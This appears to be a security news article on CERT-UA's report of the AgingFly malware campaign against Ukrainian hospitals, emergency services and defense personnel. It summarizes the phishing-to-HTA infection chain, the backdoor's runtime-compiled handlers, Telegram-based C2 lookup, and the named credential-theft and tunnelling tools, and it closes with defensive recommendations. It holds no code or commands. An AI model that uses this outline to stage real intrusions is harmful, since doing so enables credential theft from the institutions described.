A newly discovered threat called AgingFly malware has been striking Ukrainian hospitals, emergency services, and local government bodies in a campaign that ran from March through April 2026. The attacks, identified by Ukraine’s Computer Emergency Response Team (CERT-UA), are designed to steal login credentials, extract sensitive data from messaging apps, and hand attackers full remote control over infected systems. The group behind the campaign, tracked as UAC-0247, has no established prior history, and its origins remain unknown.
The timing is no accident. Targeting healthcare infrastructure during wartime puts pressure on systems that cannot afford downtime. And the methods UAC-0247 used show a level of technical sophistication that goes well beyond a simple phishing run.
A Phishing Lure Designed for Wartime
The attack begins with an email. The message claims to offer humanitarian aid, a topic with obvious relevance and urgency in the context of the ongoing conflict. Recipients are urged to click a link, which takes them to one of two types of sites: a legitimate website that attackers had already compromised through a cross-site scripting (XSS) vulnerability, or a convincing fake site built with the help of AI tools.
Either way, the destination serves the same purpose. The victim downloads a ZIP archive containing a Windows shortcut file (LNK). Opening it triggers a built-in Windows handler that reaches out to a remote server, fetches an HTML Application (HTA) file, and executes it. The HTA displays a decoy form to keep the victim distracted while the real infection quietly begins in the background.
This is a multi-stage chain, and each step is designed to look normal. Native Windows tools do the heavy lifting, which makes it harder for security software to flag anything unusual.
What AgingFly Malware Actually Does
Once the infection chain completes, AgingFly malware is deployed. It is written in C# and gives its operators an extensive toolkit: remote system control, command execution, file theft, screenshot capture, keylogging, and the ability to run arbitrary code on the victim’s machine.
Communication with the attacker’s command-and-control (C2) server happens over WebSockets, and the traffic is encrypted using AES-CBC. That makes the data stream harder to inspect or flag at the network level.
But AgingFly malware has one feature that sets it apart from most backdoors. It arrives on the infected system without any pre-built command handlers. Instead, those handlers are sent from the C2 server as source code and compiled directly on the victim’s machine at runtime. This approach means the initial payload is small, its behavior is harder to predict, and security tools that rely on static detection — scanning for known code patterns — may find nothing to flag.
CERT-UA described it this way: the absence of built-in command handlers in the code, with functionality instead retrieved from the C2 server and dynamically compiled at runtime, is a distinguishing feature of AgingFly compared to similar malware families.
SILENTLOOP and the Telegram Connection
Alongside AgingFly malware, attackers deploy a PowerShell-based tool called SILENTLOOP. It handles persistence, executes commands, and updates the malware’s configuration. One of its more unusual capabilities is pulling the C2 server address from a Telegram channel. If that channel goes down, fallback mechanisms kick in. This approach makes the infrastructure resilient and harder to disrupt by simply taking down a single server.
Using Telegram as part of C2 infrastructure is a tactic that has appeared in other campaigns targeting Ukraine. It works because Telegram traffic blends in with ordinary encrypted messaging, and blocking it outright would cause its own operational problems for organisations.
Stealing Credentials and Moving Through the Network
Once inside, the attackers move quickly to extract data and expand their access. Two open-source tools do most of the credential theft.
ChromElevator, a tool originally built for security research, can decrypt and extract cookies and saved passwords from Chromium-based browsers — Google Chrome, Microsoft Edge, and Brave among them — without needing administrator privileges. ZAPiDESK, a forensic tool, targets WhatsApp for Windows by decrypting its local databases.
After pulling that data, the attackers conduct network reconnaissance using custom scripts alongside publicly available utilities. RustScan handles port scanning. Ligolo-ng and Chisel enable covert tunnelling, letting attackers move through the network without generating obvious traffic.
This combination of open-source and custom tooling is deliberate. Using widely available tools makes attribution harder, because those tools appear in many different kinds of security activity, not just attacks.
Defense Forces Also in the Crosshairs
The campaign extended beyond civilian infrastructure. In March, CERT-UA identified a separate incident targeting individuals connected to Ukraine’s Defense Forces. Attackers distributed a trojanized version of software used by FPV drone operators through the Signal messaging platform. The file was packaged to look like a legitimate update. Running it triggered a DLL side-loading attack that installed AgingFly malware without any of the earlier phishing steps.
This variant of the campaign shows that UAC-0247 adapted its delivery method based on the target. For civilian institutions, email phishing worked. For defense-linked personnel, Signal and a convincing software package made more sense.
How to Reduce the Risk
CERT-UA has published guidance for organisations looking to limit their exposure. The core recommendations focus on restricting what Windows can run. Blocking the execution of LNK, HTA, and JavaScript files removes several of the steps UAC-0247 relies on. Limiting or monitoring the use of native Windows utilities — particularly mshta.exe, PowerShell, and wscript.exe — cuts off the tools the attackers used to move from the phishing stage to the infection stage.
These are not complex changes, but they require deliberate configuration. Many organisations leave these capabilities open because legitimate software sometimes uses them. That convenience creates the gaps this campaign exploited.
Final Thoughts
The AgingFly malware campaign is a clear example of how wartime conditions create new attack surfaces. Humanitarian aid phishing works because the offer feels plausible. Targeting hospitals and emergency services works because those institutions are under pressure and may lack the resources to maintain strong security posture.
What makes AgingFly malware technically notable is its architecture. Compiling command handlers on the victim’s machine at runtime, pulling C2 addresses from Telegram, and combining custom tools with open-source utilities all point to an operation designed to stay undetected for as long as possible. Whether the goal was intelligence gathering, disruption, or both, the infrastructure built around this campaign was not thrown together quickly.
CERT-UA’s identification and disclosure of these techniques gives defenders a fighting chance. But it also makes clear that the cyber dimension of the conflict in Ukraine is evolving, not winding down.
